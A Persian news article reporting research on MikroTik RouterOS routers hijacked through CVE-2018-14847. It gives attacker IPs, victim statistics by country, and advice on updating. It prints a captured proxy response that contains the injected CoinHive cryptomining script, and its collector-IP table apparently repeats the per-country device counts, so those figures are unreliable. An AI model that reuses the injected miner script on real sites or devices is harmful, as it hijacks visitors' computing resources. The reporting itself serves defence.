روترهای میکروتیک اطلاعات کاربران را به مهاجمان ارسال می‌کنند

کمیته رکن چهارم – متخصصان امنیت به‌تازگی دریافته‌اند که بسیاری از اطلاعات روترهای میکروتیک شنود می‌شوند. IPهای ایرانی نیز در میان لیست شنودشدگان قرار دارند. با ما همراه باشید تا از جزئیات بیشتر و روش‌های مقابله با این شنودها آگاه شوید.

بررسی کلی

شرکت لتونیایی میکروتیک (MikroTik)، در سال ۱۹۹۶ برای توسعه روترها و سیستم‌های بی‌سیم ISP تأسیس شد. میکروتیک هم‌اکنون در سرتاسر جهان، سخت‌افزار و نرم‌افزار اتصال به اینترنت عرضه می‌کند. در سال ۱۹۹۷، میکروتیک سیستم نرم‌افزاری RouterOS را خلق کرد. در سال ۲۰۰۲، میکروتیک تصمیم گرفت سخت‌افزار اختصاصی خود را بسازد و برند RouterBOARD را ایجاد کرد. هر دستگاه RouterBOARD، از سیستم نرم‌افزاری RouterOS بهره می‌برد.

بنابر اسناد Vault7 که WikiLeaks منتشر کرده است، ابزار هک CIA، شیمِی قرمز (Chimay Red)، از دو حفره امنیتی در (Winbox (CVE-2018-14847 و Webfig استفاده می‌کند.

Winbox و Webfig هردو از اجزای مدیریتی RouterOS اند. Winbox یک نرم‌افزار مبتنی بر ویندوز و دارای رابط گرافیکی (GUI) است؛ در حالی که Webfig مبتنی بر وب عمل می‎‌کند. پورت‌‌های مشترک این دو نرم‌افزار TCP/8291، TCP/80 و TCP/8080 هستند.

سیستم‌های هانی‌پات، طعمه‌هایی برای شناسایی و انحراف حملات سایبری و خنثی‌سازی دسترسی‌های غیرمجاز هستند. از اواسط جولای (تیر)، سیستم هانی‌پات انگلرفیش (Anglerfish Honeypot System)، بدافزاری را که از نفوذپذیری CVE-2018-14847 استفاده می‌کرد تا فعالیت‌های مخرب گسترده‌ای را اجرا کند، شناسایی کرد. محققین امنیت برخی دیگر از این قبیل فعالیت‌ها مثل تزریق کد استخراج ارز دیجیتال به روش کوین‌هایو (CoinHive) را ردیابی کرده‌ بودند.

مهاجمان بیش از ۷۵۰۰ روتر میکروتیک را شنود می‌کنند

همچنین تعداد زیادی از افراد مشاهده شده‌اند که پروکسی ساکس۴ (Socks4) بر روی دستگاهشان توسط عاملی مشکوک فعال شده‌ است.

جالب‌تر آنکه ترافیک بیش از ۷۵۰۰ نفر به آی‌پی‌هایی که توسط مهاجمان ناشناس کنترل می‌شوند، ارسال می‌شود و بدین ترتیب این افراد شنود می‌شوند.

دستگاه‌های آسیب‌پذیر

از بین ۵ میلیون دستگاه ثبت‌شده با پورت TCP/8291 باز، ۱۲۰۰۰۰۰ (یک میلیون و دویست هزار) دستگاه متعلق به میکروتیک هستند که از این بین، ۳۷۰۰۰۰ (سیصد و هفتاد هزار) دستگاه (۳۰.۸۳%) به CVE-2018-14847، آسیب‌پذیرند.

نقشه آسیب پذیری میکروتیک

نقشه گسترش آسیب‌پذیری RouterOS

کشور تعداد دستگاه‌ها
برزیل ۴۲۳۷۶
روسیه ۴۰۷۴۲
اندونزی ۲۲۴۴۱
هند ۲۱۸۳۷
ایران ۱۹۳۳۱
ایتالیا ۱۶۵۴۳
لهستان ۱۴۳۵۷
ایالات متحده ۱۴۰۰۷
تایلند ۱۲۸۹۸
اوکراین ۱۲۷۲۰
چین ۱۱۱۲۴
اسپانیا ۱۰۸۴۲
آفریقای جنوبی ۸۷۵۸
جمهوری چک ۸۶۲۱
آرژانتین ۶۸۶۹
کلمبیا ۶۴۷۴
کامبوج ۶۱۳۴
بنگلادش ۵۵۱۲
اکوادور ۴۸۵۷
مجارستان ۴۱۶۲

بیشترین دستگاه‌های آسیب‌پذیر به تفکیک کشور

حملات

تزریق کد استخراج ارز دیجیتال به روش CoinHive

بعد از فعال‌سازی پروکسی HTTP در RouterOS، مهاجم از حقه‌ای استفاده کرده و تمامی درخواست‌های پروکسی HTTP را به یک صفحه‌ی لوکال ارور ۴۰۳ هدایت می‌کند. در این صفحه‌ی ارور، لینکی از coinhive.com برای استخراج (mining) ارز دیجیتال درج شده است. با این کار مهاجم امیدوار است تا بر روی تمامی ترافیک پروکسی دستگاه کاربر، استخراج انجام دهد.

نکته قابل توجه این است که کد ماینینگ به این صورت عمل نمی‌کند. تمامی منابع خارجی وب، از جمله منابع coinhive.com که برای استخراج ارز دیجیتال مورد نیاز است، توسط (ACL (Access Control Listهای پروکسی که توسط خود مهاجمان تعبیه شده‌، مسدود می‌شود.

# curl -i --proxy http://192.168.40.147:8080 http://netlab.360.com
HTTP/1.0 403 Forbidden  
Content-Length: 418  
Content-Type: text/html  
Date: Sat, 26 Aug 2017 03:53:43 GMT  
Expires: Sat, 26 Aug 2017 03:53:43 GMT  
Server: Mikrotik HttpProxy  
Proxy-Connection: close

<html>  
<head>  
   <meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
   <title>"http://netlab.360.com/"</title>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>  
<script>  
   var miner = new CoinHive.Anonymous('hsFAjjijTyibpVjCmfJzlfWH3hFqWVT3', {throttle: 0.2});
   miner.start();
</script>  
</head>  
<frameset>  
<frame src="http://netlab.360.com/"></frame>  
</frameset>  
</html>  

پروکسی ساکس ۴ و ۹۵٫۱۵۴٫۲۱۶٫۱۲۸/۲۵ اسرارآمیز

در حال حاضر، پروکسی ساکس ۴ بر روی ۲۳۹ هزار دستگاه به‌طور مشکوکی فعال است. ساکس ۴ معمولاً از پورت TCP/4153 استفاده می‌کند. تنظیمات پروکسی ساکس ۴ فقط اجازه اتصال از آی‌پی‌های ۹۵٫۱۵۴٫۲۱۶٫۱۲۸/۲۵ را می‌دهد. مهاجمان برای به‌دست‌آوردن مجدد کنترل بعد از ریبوت دستگاه (تغییر آی‌پی)، دستگاه را طوری تنظیم می‌کنند تا به‌طور زمان‌بندی‌شده آخرین آی‌پی را با اتصال به آدرس (URL) مخصوص مهاجم گزارش کند.

همچنین مهاجم با استفاده از این پروکسی ساکس۴ آسیب‌پذیر، به‌دنبال دستگاه‌های RouterOS بیشتری می‌گردد.

هم‌اکنون، تمامی ۲۳۹ هزار دستگاه فقط اجازه دسترسی از ۹۵٫۱۵۴٫۲۱۶٫۱۲۸/۲۵ (غالباً ۹۵٫۱۵۴٫۲۱۶٫۱۶۷) را می‌دهند. پی بردن به قصد مهاجمان از این تعداد پروکسی‌ ساکس ۴ دشوار است.

شنود

دستگاه‌های RouterOS به کاربران اجازه می‌دهد تا بسته‌‌های (Packet) روتر را گرفته و این ترافیک را به یک سرور خاص ارسال کنند. مهاجمان، ترافیک ۷.۵ هزار دستگاه RouterOS را به یک سری IPهای جمع‌کننده ارسال می‌کنند. در بین این آی‌پی‌ها، ۳۷٫۱٫۲۰۷٫۱۱۴ نقش پررنگ‌تری داشته و ترافیک قابل توجهی از دستگاه‌ها به این مقصد ارسال می‌شود.

روتر میکروتیک

مهاجمان بیشتر به پورت‌های ۲۰، ۲۱، ۲۵، ۱۱۰ و ۱۴۳ علاقه دارند. این پورت ها به FTP، SMTP، POP3 و IMAP مربوط اند. همچنین پورت‌های ۱۶۱ و ۱۶۲، که مربوط به SNMP هستند، جزو پورت‌های محبوب مهاجمان محسوب می‌شوند. سوالی که پیش می‌آید این است که چرا مهاجمان پروتکل SNMP را، که به ندرت توسط کاربران استفاده می‌شود، مورد هدف قرار داده‌اند؟ آیا آن‌ها قصد شنود اطلاعات از کاربران خاصی ‌را دارند؟ هنوز پاسخ این سوال معلوم نیست.

آی‌پی جمع‌کننده تعداد دستگاه‌ها
۳۷٫۱٫۲۰۷٫۱۱۴ ۴۲۳۷۶
۱۸۵٫۶۹٫۱۵۵٫۲۳ ۴۰۷۴۲
۱۸۸٫۱۲۷٫۲۵۱٫۶۱ ۲۲۴۴۱
۵٫۹٫۱۸۳٫۶۹ ۲۱۸۳۷
۷۷٫۲۲۲٫۵۴٫۴۵ ۱۹۳۳۱
۱۰۳٫۱۹۳٫۱۳۷٫۲۱۱ ۱۶۵۴۳
۲۴٫۲۵۵٫۳۷٫۱ ۱۴۳۵۷
۴۵٫۷۶٫۸۸٫۴۳ ۱۴۰۰۷
۲۰۶٫۲۵۵٫۳۷٫۱ ۱۲۸۹۸

برترین مهاجمان

پورت تعداد دستگاه‌ها
۲۱ ۵۸۳۷
۱۴۳ ۵۸۳۲
۱۱۰ ۵۷۸۴
۲۰ ۴۱۶۵
۲۵ ۲۸۵۰
۲۳ ۱۳۲۸
۱۵۰۰ ۱۱۱۸
۸۰۸۳ ۱۰۹۵
۳۳۳۳ ۹۹۳
۵۰۰۰۱ ۹۸۴
۸۵۴۵ ۹۸۲
۱۶۱ ۶۷۷
۱۶۲ ۶۷۳
۳۳۰۶ ۳۵۵
۸۰ ۲۸۲
۸۰۸۰ ۲۴۳
۸۰۸۱ ۲۳۷
۸۰۸۲ ۲۳۰
۵۳ ۱۶۸
۲۰۴۸ ۱۶۷

پورت‌های شنود شده

کشور تعداد IPها
روسیه ۱۶۲۸
ایران ۶۳۷
برزیل ۶۱۵
هند ۵۹۴
اوکراین ۵۴۴
بنگلادش ۳۷۵
اندونزی ۳۶۴
اکوادور ۲۱۸
ایالات متحده ۱۹۱
آرژانتین ۱۸۹
کلمبیا ۱۲۲
لهستان ۱۱۳
کنیا ۱۰۶
عراق ۱۰۰
اتریش ۹۲
اقیانوسیه ۹۲
بلغارستان ۸۵
اسپانیا ۸۴
ایتالیا ۶۹
آفریقای جنوبی ۶۳
جمهوری چک ۶۲
صربستان ۵۹
آلمان ۵۶
آلبانی ۵۲
نیجریه ۵۰
چین ۴۷
هلند ۳۹
ترکیه ۳۸
کامبوج ۳۷
پاکستان ۳۲
انگلستان ۳۰
اتحادیه اروپا ۲۹
آمریکای لاتین ۲۶
شیلی ۲۵
مکزیک ۲۴
مجارستان ۲۲
نیکاراگوئه ۲۰
رومانی ۱۹
تایلند ۱۸
پاراگوئه ۱۶

تعداد قربانیان به تفکیک کشور

پیش‌گیری و مقابله

پیشنهاد می‌شود که کاربران RouterOS سیستم نرم‌افزاری خود را به‌طور منظم به‌روزرسانی کنند. همچنین بررسی کنند که پروکسی HTTP، پروکسی ساکس ۴ و ترافیک شبکه، مورد سوءاستفاده قرار نمی‌گیرد.

از میکروتیک انتظار می‌رود تا عدم اجازه دسترسی ورودی از اینترنت به Webfig و Winbox و بهبود سازوکار به‌روزرسانی‌های امنیتی را در دستور کار خود قرار دهد.

اطلاعات مهاجمان

نام IP
AS50673 Serverius Holding B.V. ۳۷٫۱٫۲۰۷٫۱۱۴
AS200000 Hosting Ukraine LTD ۱۸۵٫۶۹٫۱۵۵٫۲۳
AS56694 Telecommunication Systems, LLC ۱۸۸٫۱۲۷٫۲۵۱٫۶۱
AS24940 Hetzner Online GmbH ۵٫۹٫۱۸۳٫۶۹
AS44112 SpaceWeb Ltd ۷۷٫۲۲۲٫۵۴٫۴۵
AS22773 Cox Communications Inc. ۲۴٫۲۵۵٫۳۷٫۱
AS20473 Choopa, LLC ۴۵٫۷۶٫۸۸٫۴۳
AS53508 Cablelynx ۲۰۶٫۲۵۵٫۳۷٫۱
AS20860 iomart Cloud Services Limited. ۹۵٫۱۵۴٫۲۱۶٫۱۶۷

لیست مهاجمان

با توجه به حضور قابل توجه IPهای ایرانی در میان دستگاه‌های آسیب‌پذیر و شنودشده پیشنهاد می‌کنیم اگر از دستگاه‌های میکروتیک مجهز به RouterOS استفاده می‌کنید، هرچه سریع‌تر موارد اشاره‌شده در بخش پیش‌گیری و مقابله را بررسی کنید.

منبع : زومیت

درباره نویسنده

پست های مرتبط

پاسخ دهید


خبرگزاری هرانا

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *


Type The Blue Captcha Characters Below.